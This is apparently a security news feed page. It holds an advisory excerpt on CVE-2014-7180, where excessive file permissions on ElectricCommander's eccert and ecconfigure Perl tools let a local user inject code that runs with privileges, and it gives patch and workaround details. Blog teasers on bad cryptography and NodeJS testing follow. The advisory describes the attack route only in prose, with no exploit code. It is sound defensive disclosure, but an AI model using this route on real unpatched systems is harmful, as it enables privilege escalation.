# * Date published: Wednesday, October 22, 2014
# * CVE: CVE-2014-7180
# * CVSS v2 base score: 7.2
# * Date of last update: Wednesday, October 22, 2014
# * Vendors contacted: Electric Cloud, Inc.
# * Release mode: Coordinated
# * Discovered by: Sean Wright, Dell SecureWorks
##############################
######
Summary
ElectricCommander is a toolset that facilitates remote deployment of
environment configurations from
a centralized server to attached agents. Due to excessive file system
permissions on two Perl source
code files, an unprivileged local attacker can modify these files to insert
code. The attacker’s code is
then executed as the privileged user running these administrative tools.
------------------------------
------------------------------
Affected products
This vulnerability has been confirmed in version 4.2.4.71224 of
ElectricCommander.
------------------------------
------------------------------
Vendor information, solutions, and workarounds
This vulnerability has been addressed in later versions of the toolset.
ElectricCommander users should
upgrade to version 4.2.6 (and above) or version 5.0.3 (and above).
As an alternate manual workaround, users may set the file permissions to
become read-only after
installation of the RPM package management system.
------------------------------
------------------------------
Details
Multiple commander tools are installed with ElectricCommander, including
eccert and ecconfigure.
According to Electric Cloud documentation, eccert is a command line tool
used to manage the
ElectricCommander Certificate Authority and the certificates configured on
the ElectricCommander
system. ecconfigure is a command line tool that can change the configuration
values for any locally
installed ElectricCommander server, web, agent, or repository service. Both
of these tools involve
manipulating write-protected files, so they need to be run as a privileged
user.
------------------------------
------------------------------
↧
Bad Crypto 101
This post is part of a series about bad cryptography usage . We all rely heavily on cryptographic algorithms for data confidentiality and integrity, and although most commonly used algorithms are secure, they need to be used carefully and correctly. Just as holding a hammer backwards won't yield the expected result, using cryptography badly won't yield the expected results either.
more here............http://blog.ioactive.com/2014/10/bad-crypto-101.html
more here............http://blog.ioactive.com/2014/10/bad-crypto-101.html
↧
Code Assisted Penetration Testing of a NodeJS App
What I like to do when I start testing node apps, before doing anything else, is to look at the 3rd party installed dependencies of the app. All the dependencies should be listed in a file called package.json.
more here...........http://blog.securityinnovation.com/blog/2014/10/code-assisted-penetration-testing-of-a-nodejs-app.html
more here...........http://blog.securityinnovation.com/blog/2014/10/code-assisted-penetration-testing-of-a-nodejs-app.html
↧